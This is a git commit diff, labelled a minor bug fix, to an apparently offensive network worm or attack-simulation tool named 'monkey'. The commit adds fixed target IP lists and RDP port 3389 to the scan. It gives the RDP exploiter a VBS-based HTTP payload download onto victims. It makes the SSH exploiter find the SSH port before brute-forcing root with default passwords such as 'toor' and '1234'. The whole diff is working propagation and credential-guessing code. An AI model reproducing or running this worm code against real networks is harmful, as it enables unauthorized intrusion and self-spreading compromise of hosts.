forked from p15670423/monkey
minor bug fix
This commit is contained in:
parent
410891518f
commit
73f9821ee4
|
@ -96,6 +96,8 @@ class Configuration(object):
|
||||||
### monkey config
|
### monkey config
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
|
alive = True
|
||||||
|
|
||||||
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
|
singleton_mutex_name = "{2384ec59-0df8-4ab9-918c-843740924a28}"
|
||||||
|
|
||||||
# how long to wait between scan iterations
|
# how long to wait between scan iterations
|
||||||
|
@ -127,11 +129,11 @@ class Configuration(object):
|
||||||
|
|
||||||
#range_class = RelativeRange
|
#range_class = RelativeRange
|
||||||
range_size = 8
|
range_size = 8
|
||||||
range_class = ClassCRange
|
range_class = FixedRange
|
||||||
range_fixed = ("10.0.0.1")
|
range_fixed = ("10.0.0.9", "10.0.0.13", "192.168.1.100", "192.168.1.87")
|
||||||
|
|
||||||
# TCP Scanner
|
# TCP Scanner
|
||||||
tcp_target_ports = [22, 445, 135]
|
tcp_target_ports = [22, 445, 135, 3389]
|
||||||
tcp_scan_timeout = 1000 # 1000 Milliseconds
|
tcp_scan_timeout = 1000 # 1000 Milliseconds
|
||||||
tcp_scan_interval = 200
|
tcp_scan_interval = 200
|
||||||
tcp_scan_get_banner = True
|
tcp_scan_get_banner = True
|
||||||
|
@ -157,6 +159,7 @@ class Configuration(object):
|
||||||
ssh_user = "root"
|
ssh_user = "root"
|
||||||
ssh_passwords = ["root", "toor", "1234", "12345678"]
|
ssh_passwords = ["root", "toor", "1234", "12345678"]
|
||||||
|
|
||||||
alive = True
|
#rdp exploiter
|
||||||
|
rdp_use_vbs_download = True
|
||||||
|
|
||||||
WormConfiguration = Configuration()
|
WormConfiguration = Configuration()
|
|
@ -11,7 +11,7 @@ from rdpy.core.error import RDPSecurityNegoFail
|
||||||
from logging import getLogger
|
from logging import getLogger
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
from exploit.tools import HTTPTools
|
from exploit.tools import HTTPTools
|
||||||
from model import RDP_CMDLINE_HTTP_BITS
|
from model import RDP_CMDLINE_HTTP_BITS, RDP_CMDLINE_HTTP_VBS
|
||||||
from model.host import VictimHost
|
from model.host import VictimHost
|
||||||
from network.tools import check_port_tcp
|
from network.tools import check_port_tcp
|
||||||
from exploit.tools import get_target_monkey
|
from exploit.tools import get_target_monkey
|
||||||
|
@ -243,7 +243,10 @@ class RdpExploiter(HostExploiter):
|
||||||
# create server for http download.
|
# create server for http download.
|
||||||
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
|
||||||
|
|
||||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(src_path), 'http_path' : http_path}
|
if self._config.rdp_use_vbs_download:
|
||||||
|
command = RDP_CMDLINE_HTTP_VBS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||||
|
else:
|
||||||
|
command = RDP_CMDLINE_HTTP_BITS % {'monkey_name': os.path.basename(self._config.dropper_target_path), 'http_path' : http_path}
|
||||||
|
|
||||||
passwords = list(self._config.psexec_passwords[:])
|
passwords = list(self._config.psexec_passwords[:])
|
||||||
known_password = host.get_credentials(self._config.psexec_user)
|
known_password = host.get_credentials(self._config.psexec_user)
|
||||||
|
@ -289,9 +292,6 @@ class RdpExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
|
LOG.debug("Exploiter RdpGrinder failed, rdp failed.")
|
||||||
return False
|
return False
|
||||||
elif http_thread.downloads == 0:
|
elif http_thread.downloads == 0:
|
||||||
LOG.info("Trying rdp logging into victim %r with user"
|
|
||||||
" %s and password '%s'", host,
|
|
||||||
self._config.psexec_user, password)
|
|
||||||
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
|
LOG.debug("Exploiter RdpGrinder failed, http download failed.")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ from logging import getLogger
|
||||||
from model.host import VictimHost
|
from model.host import VictimHost
|
||||||
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
|
from network.tools import check_port_tcp
|
||||||
from exploit.tools import SmbTools, get_target_monkey
|
from exploit.tools import SmbTools, get_target_monkey
|
||||||
from network import SMBFinger
|
from network import SMBFinger
|
||||||
|
|
||||||
|
@ -49,7 +50,7 @@ class SmbExploiter(HostExploiter):
|
||||||
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
|
is_nb_open,_ = check_port_tcp(host.ip_addr, 139)
|
||||||
if is_nb_open:
|
if is_nb_open:
|
||||||
host.os['type'] = 'windows'
|
host.os['type'] = 'windows'
|
||||||
return super(HostExploiter, self).is_os_supported(host)
|
return host.os.get('type') in self._target_os_type
|
||||||
return False
|
return False
|
||||||
|
|
||||||
def exploit_host(self, host, src_path=None):
|
def exploit_host(self, host, src_path=None):
|
||||||
|
|
|
@ -5,10 +5,12 @@ import logging
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
from model import MONKEY_ARG
|
from model import MONKEY_ARG
|
||||||
from exploit.tools import get_target_monkey
|
from exploit.tools import get_target_monkey
|
||||||
|
from network.tools import check_port_tcp
|
||||||
|
|
||||||
__author__ = 'hoffer'
|
__author__ = 'hoffer'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
SSH_PORT = 22
|
||||||
|
|
||||||
class SSHExploiter(HostExploiter):
|
class SSHExploiter(HostExploiter):
|
||||||
_target_os_type = ['linux', None]
|
_target_os_type = ['linux', None]
|
||||||
|
@ -20,6 +22,16 @@ class SSHExploiter(HostExploiter):
|
||||||
ssh = paramiko.SSHClient()
|
ssh = paramiko.SSHClient()
|
||||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||||
|
|
||||||
|
port = SSH_PORT
|
||||||
|
for servkey,servdata in host.services.items():
|
||||||
|
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
|
||||||
|
port = int(servkey.replace('tcp-',''))
|
||||||
|
|
||||||
|
is_open,_ = check_port_tcp(host.ip_addr, port)
|
||||||
|
if not is_open:
|
||||||
|
LOG.info("SSH port is closed on %r, skipping", host)
|
||||||
|
return False
|
||||||
|
|
||||||
passwords = list(self._config.ssh_passwords[:])
|
passwords = list(self._config.ssh_passwords[:])
|
||||||
known_password = host.get_credentials(self._config.ssh_user)
|
known_password = host.get_credentials(self._config.ssh_user)
|
||||||
if known_password is not None:
|
if known_password is not None:
|
||||||
|
@ -32,7 +44,8 @@ class SSHExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
ssh.connect(host.ip_addr,
|
ssh.connect(host.ip_addr,
|
||||||
username=self._config.ssh_user,
|
username=self._config.ssh_user,
|
||||||
password=password)
|
password=password,
|
||||||
|
port=port)
|
||||||
|
|
||||||
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
|
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
|
||||||
host, self._config.ssh_user, password)
|
host, self._config.ssh_user, password)
|
||||||
|
|
|
@ -15,6 +15,7 @@ from model.host import VictimHost
|
||||||
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
from model import DROPPER_CMDLINE, MONKEY_CMDLINE
|
||||||
from exploit import HostExploiter
|
from exploit import HostExploiter
|
||||||
from exploit.tools import SmbTools, get_target_monkey
|
from exploit.tools import SmbTools, get_target_monkey
|
||||||
|
from network.tools import check_port_tcp
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from impacket import smb
|
from impacket import smb
|
||||||
|
|
|
@ -5,6 +5,7 @@ import logging
|
||||||
from network import HostScanner
|
from network import HostScanner
|
||||||
from config import WormConfiguration
|
from config import WormConfiguration
|
||||||
from info import local_ips
|
from info import local_ips
|
||||||
|
from network.range import *
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -26,6 +27,10 @@ class NetworkScanner(object):
|
||||||
|
|
||||||
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
|
LOG.info("Found local IP addresses of the machine: %r", self._ip_addresses)
|
||||||
|
|
||||||
|
# for fixed range, only scan once.
|
||||||
|
if WormConfiguration.range_class is FixedRange:
|
||||||
|
self._ranges = [WormConfiguration.range_class('0.0.0.0')]
|
||||||
|
else:
|
||||||
self._ranges = [WormConfiguration.range_class(ip_address)
|
self._ranges = [WormConfiguration.range_class(ip_address)
|
||||||
for ip_address in self._ip_addresses]
|
for ip_address in self._ip_addresses]
|
||||||
|
|
||||||
|
|
|
@ -13,7 +13,7 @@ from model.host import VictimHost
|
||||||
SSH_PORT = 22
|
SSH_PORT = 22
|
||||||
SSH_SERVICE = 'tcp-22'
|
SSH_SERVICE = 'tcp-22'
|
||||||
SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
|
SSH_REGEX = 'SSH-\d\.\d-OpenSSH'
|
||||||
TIMEOUT = 30
|
TIMEOUT = 10
|
||||||
BANNER_READ = 1024
|
BANNER_READ = 1024
|
||||||
LINUX_DIST_SSH = ['ubuntu', 'debian']
|
LINUX_DIST_SSH = ['ubuntu', 'debian']
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
import socket
|
import socket
|
||||||
import select
|
import select
|
||||||
|
|
||||||
DEFAULT_TIMEOUT = 30
|
DEFAULT_TIMEOUT = 10
|
||||||
BANNER_READ = 1024
|
BANNER_READ = 1024
|
||||||
|
|
||||||
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
def check_port_tcp(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
|
||||||
|
|
Loading…
Reference in New Issue